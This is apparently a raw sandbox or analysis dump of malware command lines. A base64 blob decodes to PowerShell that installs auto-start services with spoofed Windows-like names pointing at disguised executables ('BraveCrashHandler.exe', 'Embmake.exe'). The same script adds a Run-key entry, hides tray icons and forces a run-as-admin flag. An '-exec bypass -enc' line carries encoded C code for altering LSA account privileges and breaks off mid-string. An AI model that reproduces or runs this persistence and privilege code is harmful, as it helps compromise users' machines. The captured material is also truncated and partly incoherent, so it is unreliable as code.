cABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAiAEEAdQB0AG8AbQBhAHQAaQBjACIAIAAtAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlAAoATgBlAHcALQBTAGUAcgB2AGkAYwBlACAALQBOAGEAbQBlACAAIgBQAHIAbwBnAHIAYQBtAHMAQwBhAGMAaABlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAQwBhAGMAaABlACAAUAByAG8AZwByAGEAbQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABlAHMAYwByAGkAcAB0AGkAbwBuACAAIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAAQwBhAGMAaABlACAAUAByAG8AZwByAGEAbQAgAEMAbwBuAHQAcgBvAGwAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgAgAC0AUwB0AGEAcgB0AHUAcABUAHkAcABlACAAIgBBAHUAdABvAG0AYQB0AGkAYwAiACAALQBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlAAoATgBlAHcALQBTAGUAcgB2AGkAYwBlACAALQBOAGEAbQBlACAAIgBOAG8AUABlAGUAcgBEAGkAcwB0AFMAdgBjACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAUwB1AGIAQgByAGEAbgBjAGgAQwBhAGMAaABlACIAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAFMAdQBiAEIAcgBhAG4AYwBoAEMAYQBjAGgAZQAgAFAAcgBvAGcAcgBhAG0AIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgACIAQQB1AHQAbwBtAGEAdABpAGMAIgAgAC0AQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAQQByAG0ANgA0AC4AZQB4AGUACgBOAGUAdwAtAFMAZQByAHYAaQBjAGUAIAAtAE4AYQBtAGUAIAAiAFMAcABvAG8AbABlAHIAQwBvAG4AdAByAG8AbAAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFMAcABvAG8AbABlAHIAIABBAGQAdgBhAG4AYwBlACAAQwBvAG4AdAByAG8AbAAiACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABTAHAAbwBvAGwAZQByACAAUAByAG8AZwByAGEAbQAgAEMAbwBuAHQAcgBvAGwAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgAgAC0AUwB0AGEAcgB0AHUAcABUAHkAcABlACAAIgBBAHUAdABvAG0AYQB0AGkAYwAiACAALQBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAbQBhAGsAZQAuAGUAeABlAAoATgBlAHcALQBTAGUAcgB2AGkAYwBlACAALQBOAGEAbQBlACAAIgBUAGUAbABlAG0AZQB0AHIAeQBNAGcAbQB0ACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACIAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAgAEMAbwBuAHQAcgBvAGwAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgAgAC0AUwB0AGEAcgB0AHUAcABUAHkAcABlACAAIgBBAHUAdABvAG0AYQB0AGkAYwAiACAALQBCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcACIAIAAtAE4AYQBtAGUAIAAiAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAE4AYQBtAGUAIABIAHcAUwBjAGgATQBvAGQAZQAgAC0AVgBhAGwAdQBlACAAMgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiAEgAdwBTAGMAaABNAG8AZAAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAyACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGEAdABhACAAQwBvAGwAbABlAGMAdABpAG8AbgBcACIAIAAtAE4AYQBtAGUAIABBAGwAbABvAHcAVABlAGwAZQBtAGUAdAByAHkAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ATgBhAG0AZQAgAEEAbABsAG8AdwBDAG8AcgB0AGEAbgBhACAALQBWAGEAbAB1AGUAIAAwACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAgAC0AVgBhAGwAdQBlACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIABOAG8AVAByAGEAeQBJAHQAZQBtAHMARABpAHMAcABsAGEAeQAgAC0AVgBhAGwAdQBlACAAMQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAEUAeABwAGwAbwByAGUAcgAiACAALQBOAGEAbQBlACAAIgBOAG8AVAByAGEAeQBJAHQAZQBtAHMARABpAHMAcABsAGEAeQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAJABlAG4AdgA6AFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAJABlAG4AdgA6AFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAA==
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss448E.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi448B.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr448C.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr448D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc IwBkAGUAZgBpAG4AZQAgAFUATgBJAEMATwBEAEUACgAjAGQAZQBmAGkAbgBlACAAXwBVAE4ASQBDAE8ARABFAAoACgAjAGkAbgBjAGwAdQBkAGUAIAA8AHcAaQBuAGQAbwB3AHMALgBoAD4ACgAjAGkAbgBjAGwAdQBkAGUAIAA8AG4AdABzAGUAYwBhAHAAaQAuAGgAPgAKACMAaQBuAGMAbAB1AGQAZQAgADwAbgB0AHMAdABhAHQAdQBzAC4AaAA+AAoAIwBpAG4AYwBsAHUAZABlACAAPABTAGQAZABsAC4AaAA+AAoACgB2AG8AaQBkACAASQBuAGkAdABMAHMAYQBTAHQAcgBpAG4AZwAoAFAATABTAEEAXwBVAE4ASQBDAE8ARABFAF8AUwBUAFIASQBOAEcAIABMAHMAYQBTAHQAcgBpAG4AZwAsACAATABQAFcAUwBUAFIAIABTAHQAcgBpAG4AZwApAAoAewAKACAAIAAgACAARABXAE8AUgBEACAAUwB0AHIAaQBuAGcATABlAG4AZwB0AGgAOwAKAAoAIAAgACAAIABpAGYAIAAoAFMAdAByAGkAbgBnACAAPQA9ACAATgBVAEwATAApACAAewAKACAAIAAgACAAIAAgACAAIABMAHMAYQBTAHQAcgBpAG4AZwAtAD4AQgB1AGYAZgBlAHIAIAA9ACAATgBVAEwATAA7AAoAIAAgACAAIAAgACAAIAAgAEwAcwBhAFMAdAByAGkAbgBnAC0APgBMAGUAbgBnAHQAaAAgAD0AIAAwADsACgAgACAAIAAgACAAIAAgACAATABzAGEAUwB0AHIAaQBuAGcALQA+AE0AYQB4AGkAbQB1AG0ATABlAG4AZwB0AGgAIAA9ACAAMAA7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuADsACgAgACAAIAAgAH0ACgAKACAAIAAgACAAUwB0AHIAaQBuAGcATABlAG4AZwB0AGgAIAA9ACAAdwBjAHMAbABlAG4AKABTAHQAcgBpAG4AZwApADsACgAgACAAIAAgAEwAcwBhAFMAdAByAGkAbgBnAC0APgBCAHUAZgBmAGUAcgAgAD0AIABTAHQAcgBpAG4AZwA7AAoAIAAgACAAIABMAHMAYQBTAHQAcgBpAG4AZwAtAD4ATABlAG4AZwB0AGgAIAA9ACAAKABVAFMASABPAFIAVAApAFMAdAByAGkAbgBnAEwAZQBuAGcAdABoACAAKgAgAHMAaQB6AGUAbwBmACgAVwBDAEgAQQBSACkAOwAKACAAIAAgACAATABzAGEAUwB0AHIAaQBuAGcALQA+AE0AYQB4AGkAbQB1AG0ATABlAG4AZwB0AGgAIAA9ACAAKABVAFMASABPAFIAVAApACgAUwB0AHIAaQBuAGcATABlAG4AZwB0AGgAIAArACAAMQApACAAKgAgAHMAaQB6AGUAbwBmACgAVwBDAEgAQQBSACkAOwAKAH0ACgAKAE4AVABTAFQAQQBUAFUAUwAgAE8AcABlAG4AUABvAGwAaQBjAHkAKABMAFAAVwBTAFQAUgAgAFMAZQByAHYAZQByAE4AYQBtAGUALAAgAEQAVwBPAFIARAAgAEQAZQBzAGkAcgBlAGQAQQBjAGMAZQBzAHMALAAgAFAATABTAEEAXwBIAEEATgBEAEwARQAgAFAAbwBsAGkAYwB5AEgAYQBuAGQAbABlACkACgB7AAoAIAAgACAAIABMAFMAQQBfAE8AQgBKAEUAQwBUAF8AQQBUAFQAUgBJAEIAVQBUAEUAUwAgAE8AYgBqAGUAYwB0AEEAdAB0AHIAaQBiAHUAdABlAHMAOwAKACAAIAAgACAATABTAEEAXwBVAE4ASQBDAE8ARABFAF8AUwBUAFIASQBOAEcAIABTAGUAcgB2AGUAcgBTAHQAcgBpAG4AZwA7AAoAIAAgACAAIABQAEwAUwBBAF8AVQBOAEkAQwBPAEQARQBfAFMAVABSAEkATgBHACAAUwBlAHIAdgBlAHIAIAA9ACAATgBVAEwATAA7AAoACgAgACAAIAAgAC8ALwAgAAoAIAAgACAAIAAvAC8AIABBAGwAdwBhAHkAcwAgAGkAbgBpAHQAaQBhAGwAaQB6AGUAIAB0AGgAZQAgAG8AYgBqAGUAYwB0ACAAYQB0AHQAcgBpAGIAdQB0AGUAcwAgAHQAbwAgAGEAbABsACAAegBlAHIAbwBlAHMALgAKACAAIAAgACAALwAvACAACgAgACAAIAAgAFoAZQByAG8ATQBlAG0AbwByAHkAKAAmAE8AYgBqAGUAYwB0AEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHMAaQB6AGUAbwBmACgATwBiAGoAZQBjAHQAQQB0AHQAcgBpAGIAdQB0AGUAcwApACkAOwAKAAoAIAAgACAAIABpAGYAIAAoAFMAZQByAHYAZQByAE4AYQBtAGUAIAAhAD0AIABOAFUATABMACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAC8ALwAgAAoAIAAgACAAIAAgACAAIAAgAC8ALwAgAE0AYQBrAGUAIABhACAATABTAEEAXwBVAE4ASQBDAE8ARABFAF8AUwBUAFIASQBOAEcAIABvAHUAdAAgAG8AZgAgAHQAaABlACAATABQAFcAUwBUAFIAIABwAGEAcwBzAGUAZAAgAGkAbgAKACAAIAAgACAAIAAgACAAIAAvAC8AIAAKACAAIAAgACAAIAAgACAAIABJAG4AaQB0AEwAcwBhAFMAdAByAGkAbgBnACgAJgBTAGUAcgB2AGUAcgBTAHQAcgBpAG4AZwAsACAAUwBlAHIAdgBlAHIATgBhAG0AZQApADsACgAgACAAIAAgACAAIAAgACAAUwBlAHIAdgBlAHIAIAA9ACAAJgBTAGUAcgB2AGUAcgBTAHQAcgBpAG4AZwA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAC8ALwAgAAoAIAAgACAAIAAvAC8AIABBAHQAdABlAG0AcAB0ACAAdABvACAAbwBwAGUAbgAgAHQAaABlACAAcABvAGwAaQBjAHkALgAKACAAIAAgACAALwAvACAACgAgACAAIAAgAHIAZQB0AHUAcgBuACAATABzAGEATwBwAGUAbgBQAG8AbABpAGMAeQAoAAoAIAAgACAAIAAgACAAIAAgAFMAZQByAHYAZQByACwACgAgACAAIAAgACAAIAAgACAAJgBPAGIAagBlAGMAdABBAHQAdAByAGkAYgB1AHQAZQBzACwACgAgACAAIAAgACAAIAAgACAARABlAHMAaQByAGUAZABBAGMAYwBlAHMAcwAsAAoAIAAgACAAIAAgACAAIAAgAFAAbwBsAGkAYwB5AEgAYQBuAGQAbABlAAoAIAAgACAAIAApADsACgB9AAoACgBOAFQAUwBUAEEAVABVAFMAIABTAGUAdABQAHIAaQB2AGkAbABlAGcAZQBPAG4AQQBjAGMAbwB1AG4AdAAoAEwAUwBBAF8ASABBAE4ARABMAEUAIABQAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAsACAAUABTAEkARAAgAEEAYwBjAG8AdQBuAHQAUwBpAGQALAAgAEwAUABXAFMAVABSACAAUAByAGkAdgBpAGwAZQBnAGUATgBhAG0AZQAsACAAQgBPAE8ATAAgAGIARQBuAGEAYgBsAGUAKQAKAHsACgAgACAAIAAgAEwAUwBBAF8AVQBOAEkAQwBPAEQARQBfAFMAVABSAEkATgBHACAAUAByAGkAdgBpAGwAZQBnAGUAUwB0AHIAaQBuAGcAOwAKAAoAIAAgACAAIAAvAC8AIAAKACAAIAAgACAALwAvACAAQwByAGUAYQB0AGUAIABhACAATABTAEEAXwBVAE4ASQBDAE8ARABFAF8AUwBUAFIASQBOAEcAIABmAG8AcgAgAHQAaABlACAAcAByAGkAdgBpAGwAZQBnAGUAIABuAGEAbQBlAC4ACgAgACAAIAAgAC8ALwAgAAoAIAAgACAAIABJAG4AaQB0AEwAcwBhAFMAdAByAGkAbgBnACgAJgBQAHIAaQB2AGkAbABlAGcAZQBTAHQAcgBpAG4AZwAsACAAUAByAGkAdgBpAGwAZQBnAGUATgBhAG0AZQApADsACgAKACAAIAAgACAALwAvACAACgAgACAAIAAgAC8ALwAgAGcAcgBhAG4AdAAgAG8AcgAgAHIAZQB2AG8AawBlACAAdABoAGUAIABwAHIAaQB2AGkAbABlAGcAZQAsACAAYQBjAGMAbwByAGQAaQBuAGcAbAB5AAoAIAAgACAAIAAvAC8AIAAKACAAIAAgACAAaQBmACAAKABiAEUAbgBhAGIAbABlACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAATABzAGEAQQBkAGQAQQBjAGMAbwB1AG4AdABSAGkAZwBoAHQAcwAoAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUABvAGwAaQBjAHkASABhAG4AZABsAGUALAAgACAAIAAgACAAIAAgAC8ALwAgAG8AcABlAG4AIABwAG8AbABpAGMAeQAgAGgAYQBuAGQAbABlAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQQBjAGMAbwB1AG4AdABTAGkAZAAsACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAHQAYQByAGcAZQB0ACAAUwBJAEQACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAmAFAAcgBpAHYAaQBsAGUAZwBlAFMAdAByAGkAbgBnACwAIAAgACAALwAvACAAcAByAGkAdgBpAGwAZQBnAGUAcwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgADEAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAvAC8AIABwAHIAaQB2AGkAbABlAGcAZQAgAGMAbwB1AG4AdAAKACAAIAAgACAAIAAgACAAIAApADsACgAgACAAIAAgAH0ACgAgACAAIAAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAATABzAGEAUgBlAG0AbwB2AGUAQQBjAGMAbwB1AG4AdABSAGkAZwBoAHQAcwAoAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAUABvAGwAaQBjAHkASABhAG4AZABsAGUALAAgACAAIAAgACAAIAAgAC8ALwAgAG8AcABlAG4AIABwAG8AbABpAGMAeQAgAGgAYQBuAGQAbABlAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQQBjAGMAbwB1AG4AdABTAGkAZAAsACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAHQAYQByAGcAZQB0ACAAUwBJAEQACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABGAEEATABTAEUALAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAALwAvACAAZABvACAAbgBvAHQAIABkAGkAcwBhAGIAbABlACAAYQBsAGwAIAByAGkAZwBoAHQAcwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACYAUAByAGkAdgBpAGwAZQBnAGUAUwB0AHIAaQBuAGcALAAgACAAIAAvAC8AIABwAHIAaQB2AGkAbABlAGcAZQBzAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAMQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAHAAcgBpAHYAaQBsAGUAZwBlACAAYwBvAHUAbgB0AAoAIAAgACAAIAAgACAAIAAgACkAOwAKACAAIAAgACAAfQAKAH0ACgAKAHYAbwBpAGQAIABtAGEAaQBuACgAKQAKAHsACgAgACAAIAAgAEgAQQBOAEQATABFACAAaABUAG8AawBlAG4AIAA9ACAATgBVAEwATAA7AAoACgAgACAAIAAgAGkAZgAgACgAIQBPAHAAZQBuAFAAcgBvAGMAZQBzAHMAVABvAGsAZQBuACgARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAsACAAVABPAEsARQBOAF8AUQBVAEUAUgBZACwAIAAmAGgAVABvAGsAZQBuACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBPAHAAZQBuAFAAcgBvAGMAZQBzAHMAVABvAGsAZQBuACAAZgBhAGkAbABlAGQALgAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACAAcgBlAHQAdQByAG4AZQBkADoAIAAlAGQAXABuACIALAAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACgAKQApADsACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAtADEAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABEAFcATwBSAEQAIABkAHcAQgB1AGYAZgBlAHIAUwBpAHoAZQAgAD0AIAAwADsACgAKACAAIAAgACAALwAvACAAUAByAG8AYgBlACAAdABoAGUAIABiAHUAZgBmAGUAcgAgAHMAaQB6AGUAIAByAGUAcQBpAHIAZQBkACAAZgBvAHIAIABQAFQATwBLAEUATgBfAFUAUwBFAFIAIABzAHQAcgB1A